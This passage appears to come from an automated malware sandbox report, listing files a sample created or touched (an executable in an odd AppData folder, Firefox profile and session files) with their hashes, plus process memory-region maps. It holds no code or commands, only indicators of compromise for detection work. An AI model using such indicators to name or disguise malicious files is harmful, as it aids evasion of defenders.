                                                                                                      d87b3a349c5d9c3d921a8b51a92b659d8d032d2d34df030e8726ce26047a763eeb95badae75eb67720f64cbc7c389da563cacd5d68dcea146bcf180bc3773abb

                                                                                                    • C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe

                                                                                                      Filesize

                                                                                                      446KB

                                                                                                      MD5

                                                                                                      4d20b83562eec3660e45027ad56fb444

                                                                                                      SHA1

                                                                                                      ff6134c34500a8f8e5881e6a34263e5796f83667

                                                                                                      SHA256

                                                                                                      c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1

                                                                                                      SHA512

                                                                                                      718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4

                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E37BDR74GJNOHXDKFZGI.temp

                                                                                                      Filesize

                                                                                                      7KB

                                                                                                      MD5

                                                                                                      dd4e146442ec34b028995876d73bee86

                                                                                                      SHA1

                                                                                                      ade8ec21e22cf58c9f2f3488b89f3ef458654929

                                                                                                      SHA256

                                                                                                      424aff68f1612e08a20d77df16c471e24a53d5096f9909d49354420e9206b52a

                                                                                                      SHA512

                                                                                                      7261c12699e1885e2476330014bf664f9d19279919dca870ae089a095c24d409a64b4443ad8fa9e4bf330505edecf0295494acc62d8f3965a7dfd70920a0a63a

                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OIV8QMVSG742BN9UIMJK.temp

                                                                                                      Filesize

                                                                                                      7KB

                                                                                                      MD5

                                                                                                      27e1c5d6af1a7ad3d468399e6bf2ad64

                                                                                                      SHA1

                                                                                                      4db5856e3b8fc288cdab32af1edcec6de236bcbb

                                                                                                      SHA256

                                                                                                      3d235b661f4adac5ef8a8459191e6c2e5649e05b35fcd1dd7f92cc1955cccfa2

                                                                                                      SHA512

                                                                                                      f0bb246864707d633fc4143774127f4ffcf996dfdb67ac9943cf47f962ce8c5cc7ab1ff39b6ca2918e6a3e8c967a27bd8a501d1f1222890826e60aeff3dc60af

                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                      Filesize

                                                                                                      7KB

                                                                                                      MD5

                                                                                                      b5a4b89e472081022329ab16c9b61d02

                                                                                                      SHA1

                                                                                                      44ca3f71770c7d140836b2a0599ccc53c875f23b

                                                                                                      SHA256

                                                                                                      35c0e3e07bf64872a1d31f45b1d6f64ba18ad09f4d7e07000dcf9c37bdf105e1

                                                                                                      SHA512

                                                                                                      af4074b464c03a58a66a33b2dca3b2a2fb77a06b82294ef9615d08c69ec32ca1bd87aad42cec939d55f78f0b0ef0514ddfe121111b0e0983c7915d49bc3ac866

                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin

                                                                                                      Filesize

                                                                                                      2KB

                                                                                                      MD5

                                                                                                      396d30a2dca95b413ff99b62870f8e98

                                                                                                      SHA1

                                                                                                      19eb3be136aa68423f951b08d0438cdca570efbd

                                                                                                      SHA256

                                                                                                      96982827ad231d99f36b7ab36b24da84ab67a9fd63a2e1920c0c7a84c1dd7c6d

                                                                                                      SHA512

                                                                                                      bd2dc6979419d7d017d9f29a89382cc329a38459823ec8d56f72935e21268b65ec1115f3ec226eabb6ec65c7a10af2021956364d20d3f3f508bac2b7b7beac38

                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\7aaebf21-f2a1-4861-9c22-3217ab138a49

                                                                                                      Filesize

                                                                                                      745B

                                                                                                      MD5

                                                                                                      2f11096676b181ded9bfcdba538cd812

                                                                                                      SHA1

                                                                                                      366ce83a72e5c092359722bf1e78c887ee1951df

                                                                                                      SHA256

                                                                                                      fba5234718fdd5f90a1c32e53af9eb962730e6166e9adcb9737cf4dce99344aa

                                                                                                      SHA512

                                                                                                      239fb23aa68efaada2eadcecabf3129916693eb409f5b82b5e0d0f95a844ee9622ac33ae1a66d76d24ab30a04953b8c7c3f922cae94ee7defd899068ac1f5efc

                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\8ab3b727-4dfa-4881-964a-bd2045174fa3

                                                                                                      Filesize

                                                                                                      11KB

                                                                                                      MD5

                                                                                                      d40f0cc98cef88e26ab2af784d74bee4

                                                                                                      SHA1

                                                                                                      c11cb1932dcc30b2145ca39189a78529927f10fd

                                                                                                      SHA256

                                                                                                      e414b6f62e08d1b259f5591a6ce1cb547e6d9cd492370b888a5e4b8f24c2fa18

                                                                                                      SHA512

                                                                                                      74b37a73e42b0dc79914e253eda00b3d92a5368cf83ea44f495fbc56244ae6f2d4f2a755e52a4e2216edb2202864ed0b1455f8d0a2baae7de7d2a8c11db3fbf1

                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                                                                                                      Filesize

                                                                                                      6KB

                                                                                                      MD5

                                                                                                      c5f494ba2ec33432e3319e4965e7aa53

                                                                                                      SHA1

                                                                                                      f2082970b783c8e8331c5eee7d0473fd6a44f5c3

                                                                                                      SHA256

                                                                                                      c313b8c79c88fe524db769a4743c217b26c96bc514f00694360b609e305cbfe4

                                                                                                      SHA512

                                                                                                      07be5be436c821be4c96db10699703b6306dca5a9278020093f748bb7ead44c9040d4247a1afa42a37024fbc0c7f97f835989154749f23e26918c6e34c28a076

                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                      MD5

                                                                                                      fc6f7215f7abfc0a02f977f594cd7772

                                                                                                      SHA1

                                                                                                      2fcb17ad11d639811b779dd06c9dbd77a995fa74

                                                                                                      SHA256

                                                                                                      3858e440154966b22cf2c2d3608b83ff42b12271d09d4aa7b34ba19de216fbda

                                                                                                      SHA512

                                                                                                      dd831df391986f6ee51344bccac79660e506be53fadf68052340cbf049de2755a57098c6def7f5c08f7ded642cb0614726a6ad5bfdea960983ab7c3a72c00a20

                                                                                                    • memory/332-144-0x0000000006580000-0x0000000006A46000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/620-1414-0x00000000028E0000-0x00000000028E8000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/620-1413-0x000000001B670000-0x000000001B952000-memory.dmp

                                                                                                      Filesize

                                                                                                      2.9MB

                                                                                                    • memory/912-739-0x0000000000B00000-0x0000000000B64000-memory.dmp

                                                                                                      Filesize

                                                                                                      400KB

                                                                                                    • memory/1316-163-0x0000000000B50000-0x0000000000B5A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/1316-164-0x00000000049D0000-0x0000000004CB2000-memory.dmp

                                                                                                      Filesize

                                                                                                      2.9MB

                                                                                                    • memory/1316-165-0x00000000005C0000-0x00000000005DC000-memory.dmp

                                                                                                      Filesize

                                                                                                      112KB

                                                                                                    • memory/1316-166-0x00000000005E0000-0x0000000000628000-memory.dmp

                                                                                                      Filesize

                                                                                                      288KB

                                                                                                    • memory/1316-169-0x00000000007C0000-0x00000000007F4000-memory.dmp

                                                                                                      Filesize

                                                                                                      208KB

                                                                                                    • memory/1316-167-0x00000000004B0000-0x00000000004B8000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/1316-171-0x0000000000760000-0x0000000000776000-memory.dmp

                                                                                                      Filesize

                                                                                                      88KB

                                                                                                    • memory/1316-170-0x0000000001F60000-0x0000000001FAA000-memory.dmp

                                                                                                      Filesize

                                                                                                      296KB

                                                                                                    • memory/1316-168-0x0000000004FA0000-0x0000000005046000-memory.dmp

                                                                                                      Filesize

                                                                                                      664KB

                                                                                                    • memory/1356-763-0x0000000000AF0000-0x0000000000F8A000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.6MB

                                                                                                    • memory/1576-762-0x0000000000110000-0x0000000000D4D000-memory.dmp

                                                                                                      Filesize

                                                                                                      12.2MB

                                                                                                    • memory/1576-741-0x0000000000110000-0x0000000000D4D000-memory.dmp

                                                                                                      Filesize

                                                                                                      12.2MB

                                                                                                    • memory/1708-761-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                                      Filesize

                                                                                                      188KB

                                                                                                    • memory/1740-597-0x00000000010A0000-0x0000000001A90000-memory.dmp

                                                                                                      Filesize

                                                                                                      9.9MB

                                                                                                    • memory/1740-420-0x00000000010A0000-0x0000000001A90000-memory.dmp

                                                                                                      Filesize

                                                                                                      9.9MB

                                                                                                    • memory/1740-574-0x00000000010A0000-0x0000000001A90000-memory.dmp

                                                                                                      Filesize

                                                                                                      9.9MB

                                                                                                    • memory/1740-628-0x00000000010A0000-0x0000000001A90000-memory.dmp

                                                                                                      Filesize

                                                                                                      9.9MB

                                                                                                    • memory/1788-867-0x0000000000F70000-0x00000000015E6000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.5MB

                                                                                                    • memory/2172-2-0x0000000000FF1000-0x000000000101F000-memory.dmp

                                                                                                      Filesize

                                                                                                      184KB

                                                                                                    • memory/2172-0-0x0000000000FF0000-0x00000000014B6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2172-5-0x0000000000FF0000-0x00000000014B6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2172-3-0x0000000000FF0000-0x00000000014B6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2172-18-0x0000000007110000-0x00000000075D6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2172-17-0x0000000000FF0000-0x00000000014B6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2172-1-0x0000000077C90000-0x0000000077C92000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/2376-747-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                      Filesize

                                                                                                      400KB

                                                                                                    • memory/2376-751-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                      Filesize

                                                                                                      400KB

                                                                                                    • memory/2376-758-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                      Filesize

                                                                                                      400KB

                                                                                                    • memory/2376-756-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                      Filesize

                                                                                                      400KB

                                                                                                    • memory/2376-745-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                      Filesize

                                                                                                      400KB

                                                                                                    • memory/2376-755-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2376-749-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                      Filesize

                                                                                                      400KB

                                                                                                    • memory/2376-753-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                      Filesize

                                                                                                      400KB

                                                                                                    • memory/2396-1046-0x0000000000BF0000-0x0000000000E9C000-memory.dmp

                                                                                                      Filesize

                                                                                                      2.7MB

                                                                                                    • memory/2396-1047-0x0000000000BF0000-0x0000000000E9C000-memory.dmp

                                                                                                      Filesize

                                                                                                      2.7MB

                                                                                                    • memory/2400-110-0x00000000010F0000-0x0000000001102000-memory.dmp

                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/2660-70-0x00000000009C0000-0x0000000000E86000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2660-73-0x00000000009C0000-0x0000000000E86000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-868-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-139-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-1031-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-1464-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-785-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-25-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-41-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-1216-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-541-0x0000000006C50000-0x0000000007640000-memory.dmp

                                                                                                      Filesize

                                                                                                      9.9MB

                                                                                                    • memory/2688-542-0x0000000006C50000-0x000000000788D000-memory.dmp

                                                                                                      Filesize

                                                                                                      12.2MB

                                                                                                    • memory/2688-552-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-20-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-336-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-417-0x0000000006C50000-0x0000000007640000-memory.dmp

                                                                                                      Filesize

                                                                                                      9.9MB

                                                                                                    • memory/2688-42-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-742-0x0000000006C50000-0x000000000788D000-memory.dmp

                                                                                                      Filesize

                                                                                                      12.2MB

                                                                                                    • memory/2688-1384-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-24-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-22-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-419-0x0000000006C50000-0x0000000007640000-memory.dmp

                                                                                                      Filesize

                                                                                                      9.9MB

                                                                                                    • memory/2688-1435-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2688-21-0x0000000001131000-0x000000000115F000-memory.dmp

                                                                                                      Filesize

                                                                                                      184KB

                                                                                                    • memory/2688-1451-0x0000000001130000-0x00000000015F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2756-113-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/2756-127-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/2756-126-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/2756-124-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/2756-123-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2756-121-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/2756-119-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/2756-129-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/2756-117-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/2756-115-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/2776-149-0x0000000000E50000-0x0000000001316000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2776-146-0x0000000000E50000-0x0000000001316000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2784-662-0x0000000010000000-0x000000001001C000-memory.dmp

                                                                                                      Filesize

                                                                                                      112KB

                                                                                                    • memory/2784-600-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                                      Filesize

                                                                                                      188KB

                                                                                                    • memory/2784-629-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                                      Filesize

                                                                                                      188KB

                                                                                                    • memory/2792-60-0x00000000063F0000-0x00000000068B6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2792-61-0x00000000063F0000-0x00000000068B6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4.8MB

                                                                                                    • memory/2908-850-0x0000000001310000-0x000000000162A000-memory.dmp

                                                                                                      Filesize

                                                                                                      3.1MB

                                                                                                    • memory/3564-1441-0x000000013F850000-0x000000013FC40000-memory.dmp

                                                                                                      Filesize

                                                                                                      3.9MB

                                                                                                    • memory/3664-1459-0x0000000002260000-0x0000000002268000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/3664-1458-0x000000001B450000-0x000000001B732000-memory.dmp

                                                                                                      Filesize

                                                                                                      2.9MB

                                                                                                    • memory/3856-1477-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                      Filesize

                                                                                                      972KB

                                                                                                    • memory/4428-1733-0x0000000000F80000-0x0000000000FE0000-memory.dmp

                                                                                                      Filesize

                                                                                                      384KB